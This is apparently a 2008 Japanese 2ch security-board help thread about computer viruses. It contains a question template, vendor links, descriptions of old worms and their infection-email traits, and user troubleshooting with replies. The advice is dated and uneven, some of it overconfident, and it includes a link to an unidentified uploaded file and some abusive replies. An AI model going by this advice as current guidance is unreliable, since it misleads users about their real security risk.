ttp://pc11.2ch.net/test/read.cgi/sec/1210245681/
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社
ttp://ime.nu/www.trendmicro.co.jp/home/ 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック
ttp://ime.nu/www.symantec.com/region/jp/ 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
ttp://ime.nu/www.vintage-solutions.com/Japanese/ 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン
ttp://ime.nu/www.aladdin.co.jp 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社
ttp://ime.nu/www.caj.co.jp/ 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社
ttp://ime.nu/www.mcafee.com/jp/default.asp 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
ttp://ime.nu/www.nai.com/japan/download/dat3end.asp (リンク切れ) 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
ttp://ime.nu/www.ipa.go.jp/security/outline/todokede-j.html ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
ttps://www.ccc.go.jp/bot/index.html TREND MICRO ボット系ウイルス対策Web
ttp://ime.nu/www.trendmicro.com/jp/security/web/archive/overview/bot.htm インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
ttp://ime.nu/itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
ttp://ime.nu/www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx ●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
ttp://ime.nu/www.microsoft.com/japan/security/incident/sasser.mspx * Windows XP編
ttp://ime.nu/www.microsoft.com/japan/security/incident/sasser_xp.mspx * Windows 2000編
ttp://ime.nu/www.microsoft.com/japan/security/incident/sasser_2k.mspx * シマンテック
ttp://ime.nu/www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html ttp://ime.nu/www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html * トレンドマイクロ
ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
ttp://ime.nu/www.microsoft.com/japan/technet/security/virus/blaster.asp Blaster トレンドマイクロ
ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A Blaster シマンテック
ttp://ime.nu/www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html Welchia トレンドマイクロ
ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A Welchia シマンテック
ttp://ime.nu/www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html ttp://ime.nu/www.ipa.go.jp/security/topics/newvirus/netsky-q.html ・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
ttp://ime.nu/www.ipa.go.jp/security/topics/newvirus/mydoom.html ・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
ttp://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
ttp://ime.nu/www.symantec.com/region/jp/sarcj/vinfodb.html ・Trend Micro ウイルス情報
ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default.asp ・McAfee ウイルス情報
ttp://ime.nu/www.mcafeesecurity.com/japan/security/vlibrary.asp Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part67
ttp://tmp7.2ch.net/test/read.cgi/download/1209106638/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト最強決定戦!
ttp://pc11.2ch.net/test/read.cgi/sec/1202521143/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part14
ttp://pc11.2ch.net/test/read.cgi/sec/1198013147/
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
ttp://ime.nu/www.kaspersky.co.jp/scanforvirus/ シマンテック・セキュリティチェック
ttp://ime.nu/www.symantec.com/region/jp/securitycheck/index.html ウイルスバスターオンラインスキャン
ttp://ime.nu/www.trendmicro.co.jp/hcall/index.asp トレンド フレックス
ttp://ime.nu/trendflexsecurity.jp/free_security_tools/housecall_free_scan.php 削除可
BitDefender Online Scanner
ttp://ime.nu/www.bitdefender.com/scan8/ie.html 削除可
Panda ActiveScan
ttp://ime.nu/www.pandasoftware.com/activescan/jp/activescan_principal.htm 削除可
F-Secure オンラインスキャナ
ttp://ime.nu/www.f-secure.co.jp/v-descs/disinfestation.html ウイルスチェイサー for WEB
ttp://ime.nu/www.viruschaser.jp/support_online.html 関連スレッド
無償オンラインスキャンpart3【ウイルス撲滅】
ttp://pc11.2ch.net/test/read.cgi/sec/1223797859/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
フリーのアンチウイルスソフト Part18
ttp://pc11.2ch.net/test/read.cgi/sec/1223134635/
セキュリティ初心者質問スレッドpart113
ttp://pc11.2ch.net/test/read.cgi/sec/1222443322/
一番いいセキュリティソフトはなんだ!!Part58
ttp://pc11.2ch.net/test/read.cgi/sec/1221538386/
☆☆トロイの木馬☆☆5台目
ttp://pc11.2ch.net/test/read.cgi/sec/1215569127/
【PFW】フリーファイアウォールスレPart17
ttp://pc11.2ch.net/test/read.cgi/sec/1215307975/
【緊急!】ウイルス即行駆除方法【助けて!】Part3
ttp://pc11.2ch.net/test/read.cgi/sec/1214830385/
【分析】HijackThis【研究】
ttp://pc11.2ch.net/test/read.cgi/sec/1091346741/
毎日ウィルスメールが送られてくるのですが・・2通目
ttp://pc11.2ch.net/test/read.cgi/sec/1086494732/
sasser【スタコラサッサ】sasser Part2
ttp://pc11.2ch.net/test/read.cgi/sec/1083839516/
アンチウィルスソフトのウィルス誤検出
ttp://pc11.2ch.net/test/read.cgi/sec/1027753135/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
ttp://ime.nu/www.yahoo.co.jp/ ttp://ime.nu/www.google.co.jp/ 一応ウィルスバスターは先週から使ってるんだが…
あと不正アクセスが酷くてかネット回線に繋がらない…
ttp://ime.nu/www.virus.gr/portal/ ttp://ime.nu/www.virus.gr/portal/content/2008-06%2C-1-21-%CE%B9%CE%BF%CF%85%CE%BD%CE%AF%CE%BF%CF%85 ウィルスウオッチャー (Virus.grに関する説明)
ttp://ime.nu/virus-watcher.net/archives/2007/05/post_4.htm 1. G DATA 2008 ?κδοση 18.2.7310.844 - 99.05%
2. F-Secure 2008 ?κδοση 8.00.103 - 98.75%
3. TrustPort ?κδοση 2.8.0.1835 - 98.06%
4. Kaspersky ?κδοση 8.0.0.357 - 97.95%
5. eScan ?κδοση 9.0.742.1 - 97.44%
6. The Shield 2008 - 97.43%
7. AntiVir ?κδοση 8.1.00.331 Premium - 97.13%
8. Ashampoo ?κδοση 1.61 - 97.09%
9. Ikarus ?κδοση 1.0.82 - 96.05%
10. AntiVir ?κδοση 8.1.00.295 Classic - 95.54%
11. AVG ?κδοση 8.0.100 Free - 94.85%
12. BitDefender 2008 ?κδοση 11.0.16 - 94.70%
13. Avast ?κδοση 4.8.1201 Professional - 93.78%
14. Nod32 ?κδοση 3.0.650.0 - 93.36%
15. F-Prot ?κδοση 6.0.9.1 - 91.87%
16. BitDefender ?κδοση 10 Free - 91.32%
17. ArcaVir 2008 - 88.65%
18. Norman ?κδοση 5.92.08 - 87.72%
19. Vba32 ?κδοση 3.12.6.6 - 87.21%
20. McAfee Enterpise ?κδοση 8.5.0i - 86.57%
21. McAfee ?κδοση 12.0.177 - 86.39%
22. Rising AV ?κδοση 20.46.52 - 85.87%
23. Norton 2008 - 83.34%
24. Dr. Web ?κδοση 4.44.5 - 82.87%
25. Antiy Ghostbusters ?κδοση 5.2.3 - 80.23%
27. Outpost ?κδοση 6.0.2294.253.0490 - 75.35%
28. V3 Internet Security ?κδοση 2008.05.31.00 - 75.23%
29. ViRobot Expert ?κδοση 5.5 - 74.50%
30. Virus Chaser ?κδοση 5.0a - 73.65%
31. A-squared Anti-Malware ?κδοση 3.5 - 71.66%
32. PC Tools ?κδοση 4.0.0.26 - 69.82%
33. Trend Micro Antivirus+Antispyware 2008 ?κδοση 16.10.1079 - 67.28%
34. Iolo ?κδοση 4.325 - 63.98%
34. Panda 2008 ?κδοση 3.01.00 - 61.41%
36. Sophos Sweep ?κδοση 7.3.2 - 54.71%
37. ClamWin ?κδοση 0.93 - 54.68%
38. CA Anti-Virus ?κδοση 9.00.170 - 51.08%
39. Quick Heal ?κδοση 9.50 - 47.97%
40. Comodo ?κδοση 2.0.17.58 - 43.15%
41. Trojan Hunter ?κδοση 5.0.962 - 31.39%
42. Solo ?κδοση 7.0 - 21.10%
43. Protector Plus ?κδοση 8.0.C03 - 20.14%
44. PCClear ?κδοση 1.0.8.0 - 19.63%
45. AntiTrojan Shield ?κδοση 2.1.0.14 - 14.74%
46. Trojan Remover ?κδοση 6.6.9 - 13.49%
47. VirIT ?κδοση 6.2.94 - 8.63%
48. True Sword ?κδοση 4.2 - 3.42%
49. Abacre ?κδοση ?κδοση 1.4 - 0.00%
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007(8.91.1002/5.613.00)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_IFRAME.CP」
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FIFRAME%2ECP&VSect=S 某2chスレブログの画像リンクをクリックしたら、ウィルスに感染したとのポップアップが出力しました。
jpgを開くことによってウィルスに感染するケースがあるとは知らなかったので驚きました。
初めて感染してしまったみたいで、私が行った対応で正しいのか教えてください。
感染した旨のポップアップ出力。
→ウィルス情報ページで対応方法を確認し、Temporary Internet Filesの削除
→ウィルスバスターの”隔離ファイルの管理”から、該当のファイルを削除
→スキャンを行い、ウィルスが検出されないことを確認。
トレンドマイクロのウィルス情報で、過去「TROJ_IFRAME.CP」の誤検知があったようですが、
(現在のパターンファイルでは対応済みらしいですが)
”隔離ファイルの管理”から削除しても、今改めて確認したら、まだ残ってました。
誤検知で、気にしなくても良いのか。そうでないなら対応方法が心配です。
どうか、教えてください。おねがいします。
サイトの画像をクリックして拡大表示しようとした際に感染と出たのですが。
どうやら、”隔離ファイルの管理”に移るのは、サイトの画像をクリックする前のようでした。
1.該当の画像が表示されている、某スレまとめを見る(←ここで隔離ファイルへ)
2.その画像を拡大表示する為にクリック(←感染したポップアップ出力)
こんな感じだと思います。
駆除後に、再度そのサイトを開いた為に”隔離ファイルの管理”に残ったまま と
勘違いしてしまいました。
訂正いたします。
セキュリティーサポート期間内のWindowsとブラウザーが最新版で
セキュリティーホールがなく、発見された場所がTemporary Internet
Filesならウィルスの心配は99%問題ない。
スパイウェアは変な状況にならねば感染を気にしなくて良いケースが
ほとんど。
間違っています。
以上。
↓次どうぞ
レスありがとうございます。
安心しても大丈夫そうですね。
おかげで助かりました。
ぼるじょあ(・3・)質問箱 セキュ板出張所26
ttp://pc11.2ch.net/test/read.cgi/sec/1223260075/
シマンテック・ウルスバスター・マカフィーの3社のオンラインスキャンしたら
同じファイルでもウィルスと認識するところとそうじゃないところがあるんだけど
この場合どうしたらよいんでしょうか?
もし正常なファイルなのに削除してしまって問題あったらイヤだし・・・
こういう場合、そのファイルのフルパスまたはプロパティ情報を見てご自身で判断する方法があります。
見るところは、主に「作成日」「著作権」「会社名」で良いと思います。
つ VirusTotal
つ Jotti's malware scan
「作成日」「著作権」「会社名」とも変なところはなかったです
というかの補足ですが、正確には私の使っているウィルスソフト
「Kingsoft Internet Security」の「UPLive.EXE」という自動更新の
アプリケーション(?)にウィルス反応が出たのですが、
ウィルスソフト自体が感染することもあるのでしょうか?
ありがとうございます
今から調べてみます
(Avast・G DATA・NOD32)でウィルス反応が出ました
1つは「probably a variant of Win32/Genetik 」
2つは「Win32:Jpedrop-B」となっています
何かいいのありませんか?
馬鹿は氏ね
マルチですみませんが、おしえてください。
ヤフーのログイン履歴なんですが、
2008年10月24日(金曜日)14時00分47秒 オークション ログイン 成功 127.0.0.1 パソコン
これって何ですか?
ttp://ime.nu/www1.axfc.net/uploader/Ne/so/35614 pass sage 症状は今のところはっきり現れていません
誰か助けてください。お願い致します
先程delself.batをくらいまして、システムフォルダを検査したところ
Malwareに感染したkarna.datが見つかったので削除したんですが
これでひとまず安心してよいのでしょうか?
それと、最初に再起動をかけられた時から自動アップデートアイコンの横に
赤丸白バッテンアイコンがあるのですが、これは一体何なんでしょうか…
上記二点につきよろしければご教示頂けませんでしょうか
よろしくお願いいたします
なんでの質問用テンプレ使わないの?
karna.datしか検出できなかったのならまだ残ってる。
トレイアイコンはVirantixとかFakeAlertとかいうヤツだろ。
ご返事ありがとうございます
テンプレが無く失礼しました、改めて質問させてください
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキリュティゼロ9.5.0362」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Malwareに感染したkarna.dat」
今、Cドライブを検査しているのですが、この場合ですと
どこにウイルスが残留するかお伺いしたいです
この使用ソフトでは検出できないようなウィルスなのでしょうか?
セキュリティZEROだと残る可能性が高いね。
のオンラインスキャンを試して見たら?
トレンドマイクロは対応してるらしいから、トレンドフレックスで。
ありがとうございます
早速スキャンを試してみています
実は今まで調べていて、brastk.exeとやらをセーフモードで削除してみたのですが
再起動したら相変わらず赤丸バッテンが出てきて、どうもよくわかりません
このスキャンでキレイになってくれると嬉しいです
>赤丸白バッテンアイコン
多分、windowsのセキュリティーセンターのアイコンで「赤」は緊急警告
の表示だと思います。(実際に見てないので断言はできませんけど)
ポインターを、そのアイコンの上に軽く当ててセキュリティー警告らしき
表示がでればアイコンをクリックすればwindowsセキュリティーセンターの
画面が表示されて、何をなすべきか表示されると思います。
VirSCAN.org記事参照
ttp://ime.nu/virscan.org/report/8989f49db836649a3ae0cd6dac7332f5.html downloaderだったら、どこで発見されたかという事とセキュリティーホール
の有無が問題です。
ネットに関係するすべてのソフトが最新でセキュリティーホールがなく
そのマルウェアをクリックせず、発見場所がインターネットのキャッシュ
なら多分セーフですが、そうでないなら危険かもしれません。
危険な場合は、リカバリ推奨ですが、どうしても嫌なら「システムの復元」
ができれば「システムの復元」して、一旦、「システムの復元」無効にし
再度有効、そして、すべてのソフトupdate。
ご助言ありがとうございます
ひとまずオンラインスキャンが終わってから
諸々対応してみたいと思います
ご協力いただいた皆様も、ありがとうございました
スキャンの結果%Windir%\drivers\beep.sys、%System%\dllcache\beep.sys、
%System%\drivers\beep.sysの三つからウイルスが見つかりまして
削除、再びbrastk.exeも削除で赤丸バッテンは消えました
挙動にも問題ございません
でご指摘のとおりフェイクアラートだったようです
ttp://ime.nu/www.avira.com/jp/threats/section/fulldetails/id_vir/4360/tr_fakealert.hc.html 大変お騒がせ致しました
ttp://82.98.235.113 ファイル未検出とかいうのが一緒にでてくるん
ですけどこれはウィルスと関係あるのですか?
パソコン初心者でなにもわかりません
お願いします。
最近サイトを開くと
ttp://82.98.235.113 ファイル未検出とかいうのが一緒にでてくるん
ですけどこれはウィルスと関係あるのですか?
パソコン初心者でなにもわかりません
お願いします。
システムの復元ってw
死んでくださいね
おかしいね。
そのAviraのサイト
ttp://www.avira.com/jp/threats/section/fulldetails/id_vir/4360/tr_fakealert.hc.html の説明では、そのフェイクアラートのMD5チェックサムは
9d40e58d4b91df1fdf7afd3b05dba6d6
で、VirusTotalではウィルスセキリュティZEROの元になってるK7AntiVirus
でもTrojan.Win32.Malware.1として対応してるんだけど。
ttp://www.virustotal.com/analisis/84185c0f93be9207d20747e54e4bdcab パスはC:\Documents and Settings\ユーザー名\Localsettings\temp\~nsu.tmp\AU_.EXEです。
ググってみたらほとんど英語のサイトばかりで、他のプロセスを削除するだとか、HTTPプロトコルを使って他のユーザーと通信するだとか書かれていました。
ttp://ime.nu/answers.yahoo.com/question/index?qid=20080523182806AAAX3E6 英語にもPCにもめっぽう弱いので詳しい被害や対処法がわからなくて困っています。
どなたか優しい方助けてください。
一番安全確実なのはリカバリ。
Microsoft updateはカスタムでIE7インストール、その後SP3インストール。
リカバリ後はブラウザーをOperaかFirefox+Noscriptにする事。
どうしても、リカバリが嫌なら、あまり効果を期待はできないが下の方法を試したら?
「システムの復元」ができれば「システムの復元」して、その後
一旦「システムの復元」を無効にして、再度「システムの復元」を
有効にする。それでも悪影響があれば、アダ被記事参考にして
hostファイル対策。
その後、すべてのソフトを最新版にupdate。
ttp://ime.nu/www.higaitaisaku.com/fukugen.html ttp://ime.nu/www.higaitaisaku.com/hosts.html 回答ありがとうございます。
Au_.exeのプロパティを見てみたら、Jwordインストーラーと書いてありました。
IEのツールバーの検索を利用した時に押し付けられたのかもしれません。
お騒がせしてすいませんでした。
それウイルス相当のソフトなので削除が賢明です
ZIPファイルはダウンロードしただけではスパイウェアやウイルスは感染しないという事で良いでしょうか?
とあるサイトを見てからずっとショートカットキーです。、語尾に「ショートカットキー」が付いてくるのですがショートカットキーです。・・・
携帯にもウィルスは付くものなのでしょうか?ショートカットキーです。
どなたか教えてください。ショートカットキーです。
スレチです。
C:\Windows\Up\[殺人] <ユーザ名>(yyyymmdd-hhmmss)のメール.zip
が作成されたんですが
それを削除して
もう一度ふんでも
なにも起こりません。
こんなもんなんでしょうか?
パソコンには ファイアーウォール?というのが元から入ってると思います。
あとセキュリティセンター?もはいってると思うんですが・・
それと セキュリティソフトは全く別の役割をはたすんですか?
ファイアーウォールは基本的には何から守ってくれてるんでしょうか?
あとJCOMでホームページウイルススキャンサービスに入ってるんですが
それだけでは ウイルスからは守られてないんでしょうか?
ttp://www.google.co.jp/webhp?sourceid=navclient&hl=ja&ie=UTF-8 _______ __
// ̄~`i ゝ `l |
/ / ,______ ,_____ ________ | | ____ TM
| | ___ // ̄ヽヽ // ̄ヽヽ (( ̄)) | | // ̄_>>
\ヽ、 |l | | | | | | | | ``( (. .| | | | ~~
`、二===-' ` ===' ' ` ===' ' // ̄ヽヽ |__ゝ ヽ二=''
ヽヽ___// 日本
_____ _____ ______ _______
| ウェブ | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
._________________
|ファイアーウォール │・検索オプション
└────────────────┘・表示設定
| Google検索 | I'm Feeling Lucky | ・言語ツール
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
○ウェブ全体から検索 ◎日本語のページを検索
ファイアーウォール(防火壁)とは、ある特定のコンピュータネットワークとその外部との通信を制御し
内部のコンピュータネットワークの安全を維持することを目的としたソフトウェア、あるいはそのソフトウェアを搭載したハードウェアである。
外部から内部のコンピュータネットワークへ侵入しようとするクラッキング行為を火事にたとえ、それを食い止めるものとして防火壁という表現を用いている。
>あとJCOMでホームページウイルススキャンサービスに入ってるんですが
>それだけでは ウイルスからは守られてないんでしょうか?
うん。
回答ありがとうございます!!
ファイアーウォールだけでは守りが不十分だからノートンとかをいれたほうがいいんですよね?
JCOMのホームページウイルススキャンサービスだけではUSBやFD経由の
ウィルスは防止できないので、JCOMのユーザー無料サービスの
マイシールド(多分、アンラボのInternet Security )もダウンロード
してインストールしたら良い。
ついでに、メールウイルススキャンサービスと迷惑メール撃退サービスも
利用したら良い。
なるほど!
マイシ導入しておきます・・!
マイシールドをインストールするならノートンは入れる必要ない。
両方入れると不具合が起きるので、どちらか一方にすべきだ。
金持ちで金が余ってて、セキュリティー重視するなら、マイシールドより
ノートン・インターネットセキュリティー2009が良いけど、普通の人間の
場合は常識的に考えたらJCOMのユーザー無料サービスのマイシールド
選択が得だしプロバイダーのサポートも受けやすい。
オンゲしてたらフリートライアルのカスペがこんなの見つけたんだ
ググったけど意味がよくわからない
これって放置しててもいいのかな? 誰かお願いします
カスペ・スレかゲーム関係の板のそのゲームのスレで聞いた方が良いと思う。
そのゲームが安全なゲームだとすれば、ゲームソフトのドライバーの
可能性が高いようにも思えるが、そのゲームもカスペの対応も知らないので
断言できない。ゲームソフトにセキュリティーホールがあってポート解放
してたらマルウェア入れられる可能性もあるかもしれない。
返信ありがとうございます
やはりゲームに関係してたのですね
これで対象外にできます
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「AVG」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「トロイの木馬generic12.HNC」 ファイルパス C:\Program Files\VistaCodecPack\Tools\233.exe
たった今PC起動後すぐにウイルスが検出されたとメッセージが出て「この脅威の強制削除を行いますか?」
という問いかけの下に 「はい」と「いいえ」のボタン、
そして(赤字で)「強制除去によりシステムが不安定になったかあるいはクラッシュしました」とメッセージが出ています。
また該当のファイルのプロパティを見てみると
ファイルの種類 アプリケーション(exe)
説明 233
作成日時 2007?年?10?月?19?日、??0:15:45
アクセス日時 2007?年?12?月?27?日、??19:01:51
とあり同じtoolsフォルダに「238」というファイルと
「reset」
ファイルの種類 アプリケーション(exe)
説明 new user account Setup
作成日時 2007?年?11?月?16?日、??10:58:36
アクセス日時 ?2007?年?12?月?27?日、??19:01:52
という計3つのファイルがあります。
ウイルス名を検索しても何も情報がないのでどうしたらいいか分からず不安です。
何かアドバイスがあればよろしくお願いします。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_STARTPA.DS」
「C:\WINDOWS\system32\taskmagr.exe」
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FSTARTPA%2EDS トレンドマイクロの該当ページを見ても削除方法が載っていないので、教えてください。
スペルは合っているか?
taskmgr.exeではなくtaskmagr.exeなんだな?
スタートページを書き換えるタイプのようだから
スタートページが書き換えられていないか確認。
自動実行されるようになっていないか確認。
「お気に入り」に書き足すやつもあるみたいだから、
ついでに「お気に入り」も確認しておこう。
その後該当ファイルを削除すればよいかと。
とりあえず、VirusTotalで検査したら?
ttp://ime.nu/www.virustotal.com/jp/ そう言えば、数日前、taskmgr.exeではなくtaskmagr.exeがあるという者が
いたような気がする。どのスレだったか忘れたが。
ttp://pc11.2ch.net/test/read.cgi/sec/1225537809/73n-75
73 :名無しさん@お腹いっぱい。:2008/11/04(火) 06:37:16
すみません、みなさんのXPのsystem32内に「taskmagr.exe」というバージョン情報タブがないexeはあります?
「taskmgr.exe」ではなく「taskmagr.exe」です。
あら、スペル間違えてましたね。
taskmagr.exe でOKです。
スタートページもお気に入りも信頼済みサイトも何も異常無しなんですよ。
それでもウイルス検出されるんです。
